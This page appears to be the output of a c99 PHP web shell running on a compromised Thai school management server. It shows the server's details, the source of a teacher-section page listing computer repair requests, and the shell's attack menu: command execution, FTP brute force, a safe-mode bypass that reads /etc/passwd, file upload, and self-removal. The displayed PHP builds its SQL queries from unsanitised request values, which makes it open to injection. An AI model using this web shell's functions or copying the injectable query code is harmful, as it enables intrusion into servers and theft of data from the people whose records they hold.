!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ComputerList.php (16.23 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    session_start
();
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');

    
/**  Check Session User Login  */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../include/Function.php" );
    
        
/**  Create Database Object  */
        
$dbObj = new DBConn;

        
//=== SESSION
        
$Username $valid_user
        
        
        
/**  Config Table for This Page  */
        
$myTable1 "personal_tb";
        
$myTable2 "formation_tb";
        
        
$myTable2PK "Code";
        
        
/**  Table  -->  personal_tb  */
        
$query1 " SELECT *  FROM $myTable1  WHERE Username='$Username' ";
        
$result1 $dbObj->execQuery($query1);
        
$rs1 $dbObj->fetchObject($result1);
        
        
$Teacher_code $rs1->Teacher_code;
        
        
/**  Paging */
        
$page $_GET['page'];
        if( 
$page == "" ) { $page 1; }
        
        
/**  จำนวนข้อมูล ต่อ 1 หน้า  */
        
$perpage $_REQUEST['perpage'];
        if( 
$perpage == "" ) { $perpage 10; }
        
        
        
/**  Botton Name Action */
        
$action $_REQUEST['action'];
        
$id $_REQUEST['id'];
    
        if( isset(
$action) && !empty($action) ) {
            switch(
$action) {
                case 
"Delete" :
                    
$num count($id);
                    for( 
$i=0$i<$num$i++ ) {
                        
$qryDel " DELETE FROM  formation_tb  WHERE Code='$id[$i]' ";
                        
$resultDel $dbObj->runQuery($qryDel);
                        
$dbObj->freeresult($resultDel);
                    }
                break;
            } 
# switch
        
# if
        
        
    
# else
 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title>MIS -- Teacher</title>
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>
<script language="javascript">
function checkAllDelete(oAllCheckBox,frm) {
    for(i=0; i<frm.elements.length; i++) {
        if( (frm.elements[i].type == "checkbox") && (frm.elements[i] != oAllCheckBox) ) {
            if(oAllCheckBox.checked==true) {
                frm.elements[i].parentElement.parentElement.style.backgroundColor='#E5E9F2';
                frm.elements[i].checked=true;
            } else {
                frm.elements[i].parentElement.parentElement.style.backgroundColor='';            
                frm.elements[i].checked=false;            
            }
        } // end..if
    } // end..for
} // end..function

//----------- Confirm before Deleted
function confirmDelete(frm) { 
    //-- loop through all elements
    for(i=0; i<frm.length; i++) {
        //-- Look for our checkboxes only
        if(frm.elements[i].name.indexOf('id') !=-1) {
            //-- If any are checked then confirm alert, otherwise nothing happens
            if(frm.elements[i].checked) {
                return confirm('ต้องการลบข้อมูลที่เลือก?')
            }
        } // end..if
    } // end..for
} // end..function

//----------- Highlight Rows
function highlightRow(chkBox) {
   var IsChecked = chkBox.checked;            

  if(IsChecked) {
       chkBox.parentElement.parentElement.style.backgroundColor='#E5E9F2';  
       chkBox.parentElement.parentElement.style.color='blue'; 
  } 
  else {
       chkBox.parentElement.parentElement.style.backgroundColor='white'; 
       chkBox.parentElement.parentElement.style.color='black'; 
  }
}
</script>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    
include("../templates/incHeader.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td>
    <td width="800" height="440" align="center" valign="top" style="padding:10px 0px 5px 10px">
    <?php
        
/**  Config Paging  */
        
if( $perpage == "" ) { $limit $_Config_limit; }
        else { 
$limit $perpage; }
        
        
$scroll $_Config_scroll
        
        
        
/**  ตั้งค่า Default สำหรับการทำ Order By  */
        
if( $OrderBy == "" ) { $OrderBy $myTable2PK; }
                        
        if( !isset(
$_GET['ASCDESC']) ) { $ASCDESC "DESC"; }
                        
        if( 
$_GET['ASCDESC'] == "DESC" ) { $ASCDESC "ASC"; }
        elseif( 
$_GET['ASCDESC'] == "ASC" ) { $ASCDESC "DESC"; } 
        
        
/**  Query เพื่อหา Numrows ก่อน  */
        
$query " SELECT *  FROM $myTable2  WHERE Teacher_code='$Teacher_code' ";
        
        
$result $dbObj->execQuery($query);
        
$numrows $dbObj->_numrows;
        
        
/**  Paging  */
        
$display = ( !isset ($_GET['page']) ) ? $_GET['page'];
        
$start = ( ($display $limit) - $limit );
        
/**  Paging  */
        
        
if( isset($_GET['OrderBy']) ) {
            
$query " SELECT *  FROM $myTable2  WHERE Teacher_code='$Teacher_code'  ORDER BY $OrderBy $ASCDESC ";
        } 
        elseif( !isset(
$_GET['OrderBy']) ) {
            
$query " SELECT *  FROM $myTable2  WHERE Teacher_code='$Teacher_code'  ORDER BY $myTable2PK DESC ";
        }
        
        
$query .= " LIMIT $start, $limit ";
        
$result $dbObj->execQuery($query);
    
?>
    <fieldset>
     <table width="780" border="0" cellspacing="0" cellpadding="0">
      <form id="myForm" name="myForm" method="post" action="<?=$PHP_SELF;?>?page=<?=$page;?>">
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td style="padding-left:15px;"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>&raquo; <a href="Menu_Teach.php">ข้อมูลทั่วไปบุคลากร</a> &raquo; <span class="NOTE">แจ้งซ่อมเครือข่ายและอุปกรณ์คอมพิวเตอร์</span></strong></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height="350" align="center" valign="top">
        <table width="760" border="0">
                  <tr>
                    <td><font size="2" face="MS Sans Serif"><a href="../webboard/postq.php?Category=<? echo $Category?>&amp;page=<? echo $page?>">
                    <?php
                        
// table อธิบายความหมายของรูปคำถาม
                        
echo "<table width=760 height=36 border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";
                        echo 
"<tr><td align=left>\n";
                        
//echo "\t &nbsp;<img src='../webboard/pic/cam.gif' border=\"0\"> - คำถามที่มีรูป \n";
                        
echo "\t&nbsp;<img src='../webboard/pic/new2day.gif' border=\"0\"> - คำถามที่มีคนตั้งใหม่วันนี้ \n";
                        echo 
"\t &nbsp;<img src='../webboard/pic/update2day.gif' border=\"0\"> - คำถามที่มีคนตอบวันนี้\n";
                        
                        echo 
"</td></tr>\n";
                        echo 
"</table>\n\n";
                        echo  
"<br>";


                        
$chk_date substr(date("Y-m-d H:i:s"),-19,-9);
                        
                        if ( empty(
$page) ) {
                            
$page=1;
                        }
                    
                        
// ติดต่อ database เพื่ออ่านข้อมูล    
                        // หาจำนวนหน้าทั้งหมด
                        //mysql_connect($host,$user,$passwd);
                        //mysql_query("SET NAMES 'tis620'");
                        
$sql " SELECT No  FROM webboard_data  WHERE Teacher_code='$Teacher_code' ";
                        
$result mysql_db_query($dbname,$sql);
                        @
$NRow mysql_num_rows($result);
                        
                        @
$rt = ($NRow%$list_page);
                        if(
$rt!=0) { 
                            
$totalpage floor($NRow/$list_page)+1
                        }
                        else {
                            @
$totalpage floor($NRow/$list_page); 
                        }
                        
$goto = ($page-1)*$list_page;
                    
                    
                        
// Query ข้อมูลตามจำนวนที่กำหนด
                        
$sql " SELECT *  FROM webboard_data  WHERE  Teacher_code='$Teacher_code'  ORDER BY No DESC  LIMIT $goto,$list_page ";
                        
$result mysql_db_query($dbname,$sql);
                        @
$NRow mysql_num_rows($result);
                    
                        if( 
$NRow==) { 
                            echo 
"<center>";
                            echo 
"<br>";
                            echo 
"<font size=2 face='MS Sans Serif'>ยังไม่มีคำถาม เมื่อไหร่จะมีน้อ</font><br><br>\n";
                            echo 
"<center>";
                        }
                        
// แสดงหัวข้อของบอร์ด
                        
else {
                            echo 
"<table  width=809 height=36 border=1 bordercolor=black cellspacing=0 cellpadding=2>\n";
                            echo 
"<tr bgcolor= dodgerblue>\n";
                            echo 
"\t<td align=center width=8%><font size=2 color=#FFF8DC><b>คำถามที่</b></font></td>\n";
                            echo 
"\t<td align=center width=47% ><font size=2 color=#FFF8DC><b>คำถาม-[จำนวนคำตอบ] [จำนวนคนเข้าอ่าน]</b></font></td>\n";
                            echo 
"\t<td align=center width=24%><font size=2 color=#FFF8DC><b>ผู้ถาม[วันที่ถาม]</b></font></td>\n";
                            echo 
"\t<td align=center width=18%><font size=2 color=#FFF8DC><b>ผู้ตอบ[วันที่ตอบ]</b></font></td>\n";
                            echo 
"</tr>\n\n";
                    
                            
// วนลูปแสดงข้อมูลที่อ่านได้
                            
while ($row mysql_fetch_array($result)) {
                                
                                
// กำหนดสีของตาราง เพื่อให้มีการสลับสี
                                //$bgc = ($bgc=="lightcyan") ? "powderblue" : "lightcyan";
                    
                                
$bgc = ($bgc==$rowColor1) ? $rowColor2 $rowColor1
                    
                                
// กำหนดค่าตัวแปร
                                
$No sprintf("%05d",$row["No"]);
                                
$Question $row["Question"];
                                
$Name $row["Name"];
                                
$Namer $row["Namer"];
                                
$Member $row["Member"];
                                
$Memberr $row["Memberr"];
                                
$nphoto $row["nphoto"];
                                
$ckDate trim(substr($row["Date"],-19,-9)); // แสดงเฉพาะวันที่
                                
$Date convert_date($row["Date"]);
                                
$Reply $row["Reply"];
                    
                                
$ckReplyDate trim(substr($row["ReplyDate"],-19,-9)); 
                                
$ReplyDate convert_date($row["ReplyDate"]);
                                
$pageviewdata $row["pageview"];
                                
// แสดงเฉพาะวันที่
                                
if($Date==$chk_date) {
                                    echo 
"<tr bgcolor=$rowHiLight>\n";
                                } 
                                elseif(
$ReplyDate==$chk_date) {
                                    echo 
"<tr bgcolor=$rowHiLight>\n";    
                                } 
                                else {
                                    echo 
"<tr bgcolor=$bgc>\n";            
                                }
                                
// แสดงรูป folder
                                
                                ////new
                                     
                                
if($Reply>="3" ) {
                                    echo 
"\t<td align=center><img src='../webboard/pic/hotfd.gif'> $No</td>\n";
                                }
                                elseif(
$ReplyDate!="") {
                                    echo 
"\t<td align=center><img src='../webboard/pic/openfd.gif'> $No</td>\n";
                                } 
                                elseif(
$Date==$chk_date) {
                                    echo 
"\t<td  align=center ><img src='../webboard/pic/newfd.gif'> $No</td>\n";
                                } 
                                else {
                                    echo 
"\t<td align=center><img src='../webboard/pic/closefd.gif'> $No</td>\n";
                                }
                    
                    
                                if( (
$ckReplyDate==$chk_date) && ($nphoto!='') && ($ckDate==$chk_date) ) {
                                    echo 
"\t<td><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
                                }
                                elseif( (
$ckReplyDate==$chk_date) && ($nphoto!='') ) {
                                    echo 
"\t<td><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
                                }
                                elseif( (
$ckReplyDate==$chk_date) && ($ckDate==$chk_date) ) {
                                    echo 
"\t<td ><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
                                } 
                                elseif( 
$ckReplyDate==$chk_date ) {
                                    echo 
"\t<td  ><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>]   [<font color=red> $pageviewdata </font>]</td>\n";
                                } 
                                elseif( (
$nphoto!='') && ($ckDate==$chk_date) ) {
                                    echo 
"\t<td ><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question </a><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/cam.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
                                } 
                                elseif(
$nphoto!='') {
                                    echo 
"\t<td ><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/cam.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
                                } 
                                elseif( 
$ckDate==$chk_date ) {
                                    echo 
"\t<td ><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/new2day.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
                                } 
                                else {
                                    echo 
"\t<td><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question</a>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
                                }            
                    
                                if( 
$Member ) {
                                    echo 
"\t<td>$Name <img src='../webboard/pic/online.gif'> <font color=blue> [$Date]</font></td>\n";
                                }
                                else {
                                    echo 
"\t<td>$Name <font color=blue> [$Date]</font></td>\n";
                                }
                                
                                
// ตรวจสอบว่ามีคนตอบคำถามหรือยัง
                                
if($Memberr) {
                                    if(
$ckReplyDate!="" ) {
                                        echo 
"\t<td>$Namer <img src='../webboard/pic/online.gif'> <font color=blue>[$ReplyDate]</font></td>\n";
                                    }
                                    else {
                                        echo 
"\t<td> ยังไม่มีคนตอบ </td>\n";
                                    }
                                    echo 
"</tr>\n\n";
                                } else {
                                    if(
$ckReplyDate!="" ) {
                                        echo 
"\t<td> $Namer <font color=blue>[$ReplyDate]</font></td>\n";
                                    }
                                    else {
                                        echo 
"\t<td> ยังไม่มีคนตอบ </td>\n";
                                    }
                                    echo 
"</tr>\n\n";
                                } 
# else
                            
                            
# while
                            
echo "</table>\n\n";
                            
                            
// table อธิบายความหมายของรูป
                            
echo "<table  width=809 height=36 border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";
                            echo 
"<tr><td align=left>\n";
                            echo 
"\t<img src='../webboard/pic/newfd.gif'> - คำถามใหม่ \n";
                            echo 
"\t<img src='../webboard/pic/closefd.gif'> - คำถามเก่า \n";
                            echo 
"\t<img src='../webboard/pic/openfd.gif'> - คำถามที่ถูกตอบแล้ว\n";
                            echo 
"\t<img src='../webboard/pic/hotfd.gif'> - คำถามที่มีคนตอบมาก\n";
                            echo 
"\t<img src='../webboard/pic/cam.gif'> - คำถามที่มีรูป\n";
                            echo 
"\t<img src='../webboard/pic/online.gif'> - สมาชิกเว็บบอร์ด\n";
                            echo 
"</td></tr>\n";
                            echo 
"</table>\n\n";
                    
                            
// table แสดงเลขหน้า
                            
echo "<table  width=809 height=36 border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";
                            echo 
"<tr><td align=left>\n";
                            echo 
"\t<font size=2 color=#9400D3>\n";
                    
                            
// สร้าง link เพื่อไปหน้าก่อน-หน้าถัดไป
                            
if($page>&& $page<=$totalpage) {
                                
$prevpage $page-1;
                                echo 
"\t<a href='ComputerList.php?Teacher_code=$Teacher_code&page=$prevpage'>[หน้าก่อน = $prevpage]</a>\n";
                            }
                    
                            echo 
"\t กำลังแสดงหน้าที่ $page/$totalpage \n";
                    
                            if(
$page!=$totalpage) {
                                
$nextpage $page+1;
                                echo 
"\t<a href='ComputerList.php?Teacher_code=$Teacher_code&page=$nextpage'>[หน้าถัดไป = $nextpage]</a>\n";
                            }
                    
                            echo 
"\t</font>\n";
                            echo 
"</td></tr>\n";
                            echo 
"<tr><td>\n";
                    
                            
// วนลูปแสดงเลขหน้าทั้งหมด
                            
for($i=$i<$page $i++) {
                                echo 
"\t<a href='ComputerList.php?Teacher_code=$Teacher_code&page=$i'>$i</a> \n";
                            }
                            echo 
"\t<font size=2 color=red><b>$page</b></font> \n";
                            
                            for(
$i=$page+$i<=$totalpage $i++) {
                                echo 
"\t<a href='ComputerList.php?Teacher_code=$Teacher_code&page=$i'>$i</a> \n";
                            }
                        
                            echo 
"</td></tr>\n";
                            echo 
"</table>\n";
                            
                        } 
# else
                    
?>
                    </a></font></td>
                  </tr>
                </table></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr></form>
    </table>
   </fieldset></td>
  </tr>
</table>
<?php include("../templates/incFooter.php"); ?>
</body>
</html>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result1);
    
    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0151 ]--